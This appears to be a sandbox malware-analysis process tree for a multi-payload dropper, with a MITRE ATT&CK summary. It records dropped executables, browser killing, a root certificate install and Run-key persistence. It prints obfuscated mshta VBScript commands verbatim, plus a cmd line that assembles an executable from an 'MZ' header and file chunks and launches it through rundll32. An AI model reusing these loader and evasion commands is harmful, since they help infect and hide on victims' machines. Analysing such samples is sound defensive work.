C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe4⤵
- Loads dropped DLL
PID:880 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun15901f2f025e.exeSun15901f2f025e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1548 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1744
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe4⤵
- Loads dropped DLL
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun15dbd675f871ca.exeSun15dbd675f871ca.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1136 -
C:\Users\Admin\Pictures\Adobe Films\cy3kSrs91iP0oHt4myGTMexE.exe"C:\Users\Admin\Pictures\Adobe Films\cy3kSrs91iP0oHt4myGTMexE.exe"6⤵
- Executes dropped EXE
PID:2600
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1136 -s 11606⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe4⤵
- Loads dropped DLL
PID:764 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun15f67075f27a2b5b.exeSun15f67075f27a2b5b.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1040 -
C:\Users\Admin\AppData\Roaming\2139327.scr"C:\Users\Admin\AppData\Roaming\2139327.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Users\Admin\AppData\Roaming\8472186.scr"C:\Users\Admin\AppData\Roaming\8472186.scr" /S6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:3016 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:768
-
-
-
C:\Users\Admin\AppData\Roaming\2791837.scr"C:\Users\Admin\AppData\Roaming\2791837.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2220
-
-
C:\Users\Admin\AppData\Roaming\2946390.scr"C:\Users\Admin\AppData\Roaming\2946390.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone4⤵
- Loads dropped DLL
PID:1984 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun1577c3e159a3e3815.exeSun1577c3e159a3e3815.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1577c3e159a3e3815.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun1577c3e159a3e3815.exe" & exit6⤵PID:2356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun1577c3e159a3e3815.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe4⤵
- Loads dropped DLL
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun15f1b1f8c669.exeSun15f1b1f8c669.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe4⤵
- Loads dropped DLL
PID:1404 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun159ff1acacf.exeSun159ff1acacf.exe5⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun159ff1acacf.exeC:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun159ff1acacf.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe4⤵
- Loads dropped DLL
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun152bea652bd7232.exeSun152bea652bd7232.exe5⤵
- Executes dropped EXE
PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe4⤵
- Loads dropped DLL
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun1507db358fce61c0b.exeSun1507db358fce61c0b.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:556
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe4⤵
- Loads dropped DLL
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun152e52d07b74d9b5.exeSun152e52d07b74d9b5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:520 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 520 -s 16886⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun158d8ef840.exe4⤵
- Loads dropped DLL
PID:936 -
C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun158d8ef840.exeSun158d8ef840.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1160
-
-
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun158d8ef840.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )1⤵PID:1424
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun158d8ef840.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS01377CF5\Sun158d8ef840.exe") do taskkill /F -Im "%~NxU"2⤵
- Loads dropped DLL
PID:1868 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Sun158d8ef840.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1784
-
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:672 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )4⤵PID:2080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"5⤵PID:2180
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )4⤵PID:2264
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I5⤵PID:2364
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "6⤵PID:2404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"6⤵PID:2420
-
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I6⤵PID:2440
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I7⤵
- Loads dropped DLL
PID:2468 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I8⤵PID:784
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:652
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8C0A.exeC:\Users\Admin\AppData\Local\Temp\8C0A.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1341954651-16872458479414536545887104041255696498597816278-1570848547-27212991"1⤵PID:2356
-
C:\Windows\system32\taskeng.exetaskeng.exe {87EBBFC6-8654-4F4D-AB59-56D66E41124B} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1416
-
C:\Users\Admin\AppData\Roaming\veejcgtC:\Users\Admin\AppData\Roaming\veejcgt2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:564
-
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:2032
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0D3D6EF3-607B-4D37-81EF-4DB77B148072} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1984
-
C:\Windows\system32\taskeng.exetaskeng.exe {2DE1BBEC-9BCF-45F2-844C-03C9BD44F01C} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:984
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:2656
-
-
C:\Users\Admin\AppData\Roaming\veejcgtC:\Users\Admin\AppData\Roaming\veejcgt2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1404
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {63717728-C51A-4F26-8238-7598C0D78F98} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1084
-
C:\Windows\system32\taskeng.exetaskeng.exe {DA0528EC-B844-4300-BFE6-0DF6DC8CA7E1} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2404
-
C:\Users\Admin\AppData\Roaming\veejcgtC:\Users\Admin\AppData\Roaming\veejcgt2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2980
-
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1